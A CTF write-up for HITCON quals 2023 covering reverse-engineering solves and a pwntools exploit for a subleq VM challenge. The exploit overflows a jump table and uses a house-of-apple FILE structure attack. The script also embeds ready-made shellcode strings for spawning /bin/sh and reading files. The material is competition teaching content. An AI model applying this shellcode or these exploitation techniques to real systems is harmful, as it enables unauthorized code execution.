hitcon-quals-2023

I learned a lot from this game and from the other players on Maltese Prison Escapees. Sadly, although I could solve some challenges, the other players were so quick that I got zero points in this game. I guess I need to try harder next time. Here are the writeups for the challenges I solved (or almost solved).

blade_blade

It is a seccomp shell implemented in Rust in which we can execute several commands. After some checking, I found a flag command that calls the seccomp_shell::shell::verify function.

This function has a huge loop to shuffle and encode the input flag.

First, a few code blocks shuffle the bytes of the flag.


The last part of the loop does something different.


This last loop encodes the flag byte by byte (each output byte depends on a single input byte), so the quick way is to feed every printable character through it once and build a table mapping each encoded byte back to its plaintext byte.

The server sends shellcode for the client to execute several times; each time, it embeds the (shuffled) input and the final result into the shellcode. As shown in the picture, the input is placed at the marker !RA\x11 and the result at DEADBEEF.


CrazyArcade

It is a game that communicates with a driver, and all communication goes through DeviceIoControl. It first reads 0x584 bytes from the driver and stores them in qword_7FF76B286248.


Then it sends 37 bytes, the initial value of our flag, to the driver.


In the xrefs to DeviceIoControl we can find another place where the program communicates with the driver.


This function is hit every time we kill a bot in the game: it gets a byte from the driver, does some calculations on it, and sends it back. The limit on the number of rounds is 0x1337, so we get our solution.

# the initial 37-byte flag value that the game sends to the driver
res = b'\xb7\x8a\x19\x7fT-\x81\xf0\xb8\xdd\xca\xc9\xd3\xc3#2\xbaA\x81\xab\x02S\xc9.\xd6~ \xad\xab\xed\x95\xd2\xb6\xe7*\x92>'
# the 0x584 bytes the game reads from the driver at startup (stored in qword_7FF76B286248)
data=[0x48, 0x89, 0x54, 0x24, 0x10, 0x53, 0x57, 0x48, 0x83, 0xEC, 0x48, 0x48, 0x8B, 0xFA, 0x33, 0xDB, 0x89, 0x5F, 0x30, 0x48, 0x89, 0x5F, 0x38, 0x48, 0x8B, 0x87, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x57, 0x18, 0x8B, 0x50, 0x10, 0x44, 0x8B, 0x48, 0x08, 0x80, 0x38, 0x0E, 0x0F, 0x85, 0x3B, 0x05, 0x00, 0x00, 0x8B, 0x40, 0x18, 0x05, 0x00, 0xE0, 0xFF, 0x7F, 0x83, 0xF8, 0x54, 0x0F, 0x87, 0x23, 0x05, 0x00, 0x00, 0x4C, 0x8D, 0x05, 0x86, 0x05, 0x00, 0x00, 0x49, 0x0F, 0xB6, 0x04, 0x00, 0x4C, 0x8D, 0x05, 0x2E, 0x05, 0x00, 0x00, 0x49, 0x63, 0x04, 0x80, 0x4C, 0x8D, 0x05, 0x05, 0x00, 0x00, 0x00, 0x49, 0x03, 0xC0, 0xFF, 0xE0, 0x83, 0xFA, 0x30, 0x75, 0x5F, 0x49, 0x8B, 0x4A, 0x08, 0x48, 0x85, 0xC9, 0x74, 0x4A, 0x41, 0x8B, 0x42, 0x18, 0x83, 0xE8, 0x01, 0x74, 0x25, 0x83, 0xE8, 0x01, 0x74, 0x12, 0x83, 0xE8, 0x02, 0x75, 0x27, 0x41, 0x8B, 0x42, 0x14, 0x8B, 0x04, 0x08, 0x41, 0x89, 0x42, 0x1C, 0xEB, 0x1A, 0x41, 0x8B, 0x42, 0x14, 0x0F, 0xB7, 0x04, 0x08, 0x41, 0x89, 0x42, 0x1C, 0xEB, 0x0C, 0x41, 0x8B, 0x42, 0x14, 0x0F, 0xB6, 0x04, 0x08, 0x41, 0x89, 0x42, 0x1C, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x30, 0x00, 0x00, 0x00, 0xE9, 0xAF, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xA3, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x97, 0x04, 0x00, 0x00, 0x83, 0xFA, 0x30, 0x75, 0x5F, 0x49, 0x8B, 0x52, 0x08, 0x48, 0x85, 0xD2, 0x74, 0x4A, 0x41, 0x8B, 0x42, 0x18, 0x83, 0xE8, 0x01, 0x74, 0x26, 0x83, 0xE8, 0x01, 0x74, 0x12, 0x83, 0xE8, 0x02, 0x75, 0x27, 0x41, 0x8B, 0x4A, 0x14, 0x41, 0x8B, 0x42, 0x1C, 0x89, 0x04, 0x11, 0xEB, 0x1A, 0x41, 0x8B, 0x4A, 0x14, 0x66, 0x41, 0x8B, 0x42, 0x1C, 0x66, 0x89, 0x04, 0x11, 0xEB, 0x0B, 0x41, 0x8B, 0x4A, 0x14, 0x41, 0x8A, 0x42, 0x1C, 0x88, 0x04, 0x11, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x30, 0x00, 0x00, 0x00, 0xE9, 0x3F, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x9A, 0x00, 0x00, 0xC0, 0xE9, 0x33, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x27, 0x04, 0x00, 0x00, 0x83, 0xFA, 0x30, 0x75, 0x28, 0x49, 
0x8B, 0xCA, 0xE8, 0xFD, 0xFD, 0xFF, 0xFF, 0x89, 0x47, 0x30, 0x85, 0xC0, 0x7C, 0x0D, 0x48, 0xC7, 0x47, 0x38, 0x30, 0x00, 0x00, 0x00, 0xE9, 0x06, 0x04, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x9A, 0x00, 0x00, 0xC0, 0xE9, 0xFA, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xEE, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x30, 0x75, 0x27, 0x49, 0x8B, 0x4A, 0x08, 0x48, 0x85, 0xC9, 0x74, 0x12, 0x41, 0x8B, 0x52, 0x10, 0xFF, 0x15, 0x71, 0x0A, 0x00, 0x00, 0x89, 0x5F, 0x30, 0xE9, 0xCE, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xC2, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xB6, 0x03, 0x00, 0x00, 0x44, 0x8B, 0xC2, 0x49, 0x8B, 0xD2, 0xE8, 0x0E, 0xFB, 0xFF, 0xFF, 0x89, 0x47, 0x30, 0x85, 0xC0, 0x7C, 0x0E, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x96, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x8A, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x72, 0x1B, 0x49, 0x8B, 0x12, 0x48, 0xB9, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x15, 0x05, 0x0A, 0x00, 0x00, 0x89, 0x47, 0x30, 0xE9, 0x6A, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x01, 0x00, 0x00, 0xC0, 0xE9, 0x5E, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x1D, 0x66, 0x41, 0x8B, 0x12, 0xEC, 0x0F, 0xBE, 0xC0, 0x41, 0x89, 0x42, 0x04, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x3C, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x30, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x1E, 0x66, 0x41, 0x8B, 0x12, 0x66, 0xED, 0x0F, 0xB7, 0xC0, 0x41, 0x89, 0x42, 0x04, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x0D, 0x03, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x01, 0x03, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x1A, 0x66, 0x41, 0x8B, 0x12, 0xED, 0x41, 0x89, 0x42, 0x04, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0xE2, 0x02, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xD6, 0x02, 0x00, 0x00, 0x83, 0xFA, 
0x08, 0x75, 0x36, 0x41, 0x8B, 0x52, 0x04, 0x41, 0x8B, 0x0A, 0xE8, 0x28, 0xFD, 0xFF, 0xFF, 0x84, 0xC0, 0x75, 0x0C, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xB5, 0x02, 0x00, 0x00, 0x66, 0x41, 0x8B, 0x12, 0x41, 0x8A, 0x42, 0x04, 0xEE, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x9B, 0x02, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x8F, 0x02, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x38, 0x41, 0x8B, 0x52, 0x04, 0x41, 0x8B, 0x0A, 0xE8, 0xE1, 0xFC, 0xFF, 0xFF, 0x84, 0xC0, 0x75, 0x0C, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x6E, 0x02, 0x00, 0x00, 0x66, 0x41, 0x8B, 0x12, 0x66, 0x41, 0x8B, 0x42, 0x04, 0x66, 0xEF, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x52, 0x02, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x46, 0x02, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x36, 0x41, 0x8B, 0x52, 0x04, 0x41, 0x8B, 0x0A, 0xE8, 0x98, 0xFC, 0xFF, 0xFF, 0x84, 0xC0, 0x75, 0x0C, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x25, 0x02, 0x00, 0x00, 0x66, 0x41, 0x8B, 0x12, 0x41, 0x8B, 0x42, 0x04, 0xEF, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x0B, 0x02, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xFF, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x1C, 0x41, 0xC7, 0x02, 0x01, 0x00, 0x00, 0x00, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x41, 0x89, 0x42, 0x04, 0x89, 0x5F, 0x30, 0x48, 0x89, 0x47, 0x38, 0xE9, 0xDE, 0x01, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xD2, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x08, 0x75, 0x35, 0x41, 0x8B, 0x02, 0x8B, 0x0D, 0x5B, 0x18, 0x00, 0x00, 0x3D, 0x00, 0x00, 0x00, 0x80, 0x0F, 0x45, 0xC8, 0x89, 0x0D, 0x4D, 0x18, 0x00, 0x00, 0x41, 0x03, 0x4A, 0x04, 0x89, 0x0D, 0x43, 0x18, 0x00, 0x00, 0x41, 0x89, 0x0A, 0x89, 0x5F, 0x30, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x89, 0x47, 0x38, 0xE9, 0x98, 0x01, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x8C, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x0C, 0x75, 0x44, 
0x41, 0x8B, 0x0A, 0x0F, 0x32, 0x8B, 0xCA, 0x48, 0xC1, 0xE1, 0x20, 0x48, 0x0B, 0xC8, 0x48, 0x89, 0x4C, 0x24, 0x30, 0x48, 0xC1, 0xE9, 0x20, 0x41, 0x89, 0x4A, 0x04, 0x8B, 0x44, 0x24, 0x30, 0x41, 0x89, 0x42, 0x08, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x0C, 0x00, 0x00, 0x00, 0xE9, 0x54, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x7C, 0x24, 0x68, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x43, 0x01, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x37, 0x01, 0x00, 0x00, 0x83, 0xFA, 0x0C, 0x75, 0x3C, 0x41, 0x8B, 0x42, 0x04, 0x48, 0xC1, 0xE0, 0x20, 0x41, 0x8B, 0x4A, 0x08, 0x48, 0x0B, 0xC1, 0x48, 0x8B, 0xD0, 0x48, 0xC1, 0xEA, 0x20, 0x41, 0x8B, 0x0A, 0x0F, 0x30, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x0C, 0x00, 0x00, 0x00, 0xE9, 0x07, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x7C, 0x24, 0x68, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xF6, 0x00, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0xEA, 0x00, 0x00, 0x00, 0x83, 0xFA, 0x18, 0x75, 0x5D, 0x41, 0x8B, 0x4A, 0x10, 0x85, 0xC9, 0x74, 0x49, 0x83, 0xF9, 0x04, 0x77, 0x44, 0x4D, 0x8D, 0x4A, 0x14, 0x45, 0x8B, 0x42, 0x08, 0x41, 0x83, 0xE0, 0x07, 0x41, 0xC1, 0xE0, 0x05, 0x41, 0x8B, 0x42, 0x04, 0x83, 0xE0, 0x1F, 0x44, 0x0B, 0xC0, 0x89, 0x4C, 0x24, 0x28, 0x41, 0x8B, 0x42, 0x0C, 0x89, 0x44, 0x24, 0x20, 0x41, 0x8B, 0x12, 0xB9, 0x04, 0x00, 0x00, 0x00, 0xFF, 0x15, 0xEF, 0x06, 0x00, 0x00, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x18, 0x00, 0x00, 0x00, 0xE9, 0x94, 0x00, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x88, 0x00, 0x00, 0x00, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xEB, 0x7F, 0x83, 0xFA, 0x18, 0x75, 0x6A, 0x41, 0x8B, 0x4A, 0x10, 0x85, 0xC9, 0x74, 0x59, 0x83, 0xF9, 0x04, 0x77, 0x54, 0x41, 0x8B, 0x52, 0x0C, 0x83, 0xFA, 0x10, 0x72, 0x0E, 0x83, 0xFA, 0x27, 0x77, 0x09, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xEB, 0x56, 0x4D, 0x8D, 0x4A, 0x14, 0x45, 0x8B, 0x42, 0x08, 0x41, 0x83, 0xE0, 0x07, 0x41, 0xC1, 0xE0, 0x05, 0x41, 0x8B, 0x42, 0x04, 0x83, 0xE0, 0x1F, 0x44, 0x0B, 0xC0, 0x89, 0x4C, 
0x24, 0x28, 0x89, 0x54, 0x24, 0x20, 0x41, 0x8B, 0x12, 0xB9, 0x04, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x79, 0x06, 0x00, 0x00, 0x89, 0x5F, 0x30, 0x48, 0xC7, 0x47, 0x38, 0x18, 0x00, 0x00, 0x00, 0xEB, 0x19, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xEB, 0x10, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xEB, 0x07, 0xC7, 0x47, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0x8B, 0x5F, 0x30, 0x32, 0xD2, 0x48, 0x8B, 0xCF, 0xFF, 0x15, 0xB5, 0x06, 0x00, 0x00, 0x8B, 0xC3, 0x48, 0x83, 0xC4, 0x48, 0x5F, 0x5B, 0xC3]

res = bytearray(res)

# replay the 0x1337 bot-kill rounds: each round xors one flag byte with the
# round counter and the corresponding driver byte
for offset in range(0x1337):
    res[offset % 37] ^= (offset ^ data[offset % 0x584]) & 0xff

print(res)

lessequalmore & SUBformore

I spent a lot of time on this challenge; it is a subleq VM with plenty of instructions. I learned from it that sometimes you do not need to understand everything to solve a challenge.

It divides the input into eight blocks, treats them as an 8*8 matrix, and does some linear calculations on them. The easy way to deal with this is to hook the check, change the input one byte at a time, and monitor the resulting values to recover the coefficients.
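The byte-by-byte probing described above, as an added example that is not part of the original writeup: a constructed black-box check standing in for the VM's real one (the 8x8 matrix, the target and plain integer arithmetic are assumptions) is probed one input byte at a time to recover its coefficients, and the resulting linear system is then solved for the input.

```python
from fractions import Fraction
import random

N = 8  # the writeup's eight blocks, i.e. an 8x8 system

# Constructed stand-in for the VM's check: an invertible integer matrix (built as
# L*U with unit diagonals, so det = 1) applied to an 8-byte input and compared
# against a target. Matrix, target and integer arithmetic are assumptions.
random.seed(2023)
_L = [[1 if i == j else random.randrange(-3, 4) if i > j else 0 for j in range(N)] for i in range(N)]
_U = [[1 if i == j else random.randrange(-3, 4) if i < j else 0 for j in range(N)] for i in range(N)]
_SECRET_A = [[sum(_L[i][k] * _U[k][j] for k in range(N)) for j in range(N)] for i in range(N)]
_SECRET_X = [random.randrange(0x20, 0x7f) for _ in range(N)]  # constructed "flag" bytes
_TARGET = [sum(a * x for a, x in zip(row, _SECRET_X)) for row in _SECRET_A]

def vm_check(inp):
    """Black box standing in for the hooked check: the 8 values it compares to the target."""
    return [sum(a * x for a, x in zip(row, inp)) for row in _SECRET_A]

def recover_coefficients(check):
    """Change one input byte at a time: output i moves by A[i][j] when byte j goes 0 -> 1."""
    base = check([0] * N)
    A = [[0] * N for _ in range(N)]
    for j in range(N):
        probe = [0] * N
        probe[j] = 1
        out = check(probe)
        for i in range(N):
            A[i][j] = out[i] - base[i]
    return A

def solve_linear(A, b):
    """Gauss-Jordan elimination over the rationals; returns x with A x = b."""
    M = [[Fraction(v) for v in row] + [Fraction(bi)] for row, bi in zip(A, b)]
    for col in range(N):
        piv = next(r for r in range(col, N) if M[r][col] != 0)  # A is invertible
        M[col], M[piv] = M[piv], M[col]
        pv = M[col][col]
        M[col] = [v / pv for v in M[col]]
        for r in range(N):
            if r != col and M[r][col] != 0:
                f = M[r][col]
                M[r] = [rv - f * cv for rv, cv in zip(M[r], M[col])]
    return [int(row[N]) for row in M]

def recover_input(check, target):
    """Recover the coefficients from the black box, then solve for the input."""
    return solve_linear(recover_coefficients(check), target)
```

Calling recover_input(vm_check, _TARGET) returns the constructed input bytes; the same two-step procedure applies once the real check is hooked and exposed as a callable.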

The pwn part took me a long time, since implementing the div 8 operation in the VM takes a lot of work.

Our input is read and placed at the start of the memory section. We can overflow the program and write into the jump table, thereby hijacking the control flow of the program.

My solution is the same as the author’s intended solution so I recommend the author’s writeup.

HITCON CTF 2023 - LessEQualmore / SUBformore

However, my teammate came up with a much easier solution: house of apple. I focused too much on jumping to the stack address, but house of apple needs only a known memory address and the libc address. So here is the solve script:

#!/usr/bin/env python3

# %%
from pwn import *
from LibcSearcher import *

exe = ELF("./lessequalmore_patched")

context.binary = exe
context.os = 'linux'
context.arch = context.binary.arch
# context.terminal = ['alacritty', '-e']
context.terminal = ['wt.exe', 'wsl', '--']

local = False
if local:
    context.log_level = 'debug'
    p = process([exe.path, "chal.txt"])
else:
    p = remote("chal-lessequalmore.chal.hitconctf.com", 11111)

# debugging helpers, only active when running locally
def dbgaddr(addr, PIE=False):  # PIE enabled
    if local:
        if PIE:
            text_base = int(
                os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
            log.info(f'b *{hex(text_base + addr)}\n')
            gdb.attach(p, f'b *{hex(text_base + addr)}')
        else:
            gdb.attach(p, f'b *{hex(addr)}')

def dbg(func=''):
    if local:
        gdb.attach(p, func)

def main_arena():
    # from ptrlib; expects a global `libc` ELF object (not called by this script)
    ofs_stdin = libc.sym._IO_2_1_stdin_
    ofs_realloc_hook = libc.sym.__realloc_hook
    ofs_malloc_hook = libc.sym.__malloc_hook
    if ofs_realloc_hook is None \
            or ofs_malloc_hook is None \
            or ofs_stdin is None:
        return None

    if 0 < ofs_malloc_hook - ofs_stdin < 0x1000:
        # libc-2.33 or older
        if context.bits == 32:
            return ofs_malloc_hook + 0x18
        else:
            return ofs_malloc_hook + (ofs_malloc_hook - ofs_realloc_hook) * 2

    else:
        # libc-2.34 removed hooks
        ofs_tzname = libc.sym.tzname
        if ofs_tzname is None:
            return None
        if context.bits == 32:
            return ofs_tzname - 0x460
        else:
            return ofs_tzname - 0x8a0

def ROL(content, key):
    # house of emma
    # ROL(gadget_addr ^ fake_pointer_guard, 0x11)
    tmp = bin(content)[2:].rjust(64, '0')
    return int(tmp[key:] + tmp[:key], 2)

# dbgaddr(0x14d2,PIE=True)
# dbg("main")
# gdb.attach(p,"b *run_program+34 if $rax==0x66")

# I/O shorthands
s = lambda str: p.send(str)
sl = lambda str: p.sendline(str)
sa = lambda delims, str: p.sendafter(delims, str)
sla = lambda delims, str: p.sendlineafter(delims, str)
r = lambda numb=4096: p.recv(numb)
rl = lambda: p.recvline()
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))
li = lambda str, data: log.success(str + '========>' + hex(data))

# https://www.exploit-db.com/shellcodes
execve_bin_sh = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
execveat_bin_sh = b"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
cat_flag = b"\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x67\x6d\x60\x66\x01\x01\x01\x48\x31\x04\x24\x6a\x02\x58\x48\x89\xe7\x31\xf6\x99\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05"
ls_current_dir = b"\x68\x2f\x2e\x01\x01\x81\x34\x24\x01\x01\x01\x01\x48\x89\xe7\x31\xd2\xbe\x01\x01\x02\x01\x81\xf6\x01\x01\x03\x01\x6a\x02\x58\x0f\x05\x48\x89\xc7\x31\xd2\xb6\x03\x48\x89\xe6\x6a\x4e\x58\x0f\x05\x6a\x01\x5f\x31\xd2\xb6\x03\x48\x89\xe6\x6a\x01\x58\x0f\x05"

#%%
for i in range(0x56):
    sl(b"%x66")

id = 0x69

def idx():
    global id
    tmp_id = id
    id += 3
    return tmp_id

sl(f"%x0\n%x0\n%{idx()}")
sl(f"%x1\n%x1\n%{idx()}")
sl(f"%xfffffffffffffffe\n%x1\n%{idx()}")
sl(f"%x1\n%x0\n%{idx()}")
sl(f"%x0\n%x53d09\n%{idx()}")
sl(f"%x0\n%x0\n%{idx()}")

sl(f"%xfffffffffffffffe\n%x0\n%{idx()}")
sl(f"%x0\n%x53d02\n%{idx()}")
sl(f"%x53cfd\n%x53cf3\n%{idx()}")
sl(f"%x0\n%x0\n%{idx()}")
sl(f"%xfffffffffffffffe\n%x0\n%{idx()}")
sl(f"%x0\n%x53cee\n%{idx()}")

sl(f"%x0\n%x0\n%{idx()}")
sl(f"%x102e6\n%x0\n%{idx()}")

sl(f"%xda\n%xda\n%{idx()}")
sl(f"%xfffffffffffffffe\n%xda\n%{idx()}")
sl(f"%x0\n%xda\n%{idx()}")

sl(f"%xeb\n%xeb\n%{idx()}")
sl(f"%xfffffffffffffffe\n%xeb\n%{idx()}")
sl(f"%x0\n%xeb\n%{idx()}")
sl(f"%x0\n%x0\n%xfffffffffffffffe")

for i in range((0x600 - 0x538) // 8):
    sl(b"%x66")

from IO_FILE import *

file = IO_FILE_plus()
file._IO_write_base = 0
file._IO_buf_base = 0
payload = bytes(file)

for i in range(len(payload) // 8 + 1):
    sl(f"%0")

for i in range(0x413 - 0x65 - 17 * 3 - (0x600 - 0x538) // 8 - len(payload) // 8 - 1):
    sl(b"%x66")
sl("")
#%%
sl("%xfffffffffffffac0")
sl("%x29d3a0")
# sl("%xc044b567")
sl("%xffd5df8c9a4a0867")  # b" cat *"
sl("%xfffffffffff7efc0")
sl("%x53620")
#%%
# b *run_program+34 if $rax==0x66
# ignore 1 0x411
# b *run_program+72
p.interactive()
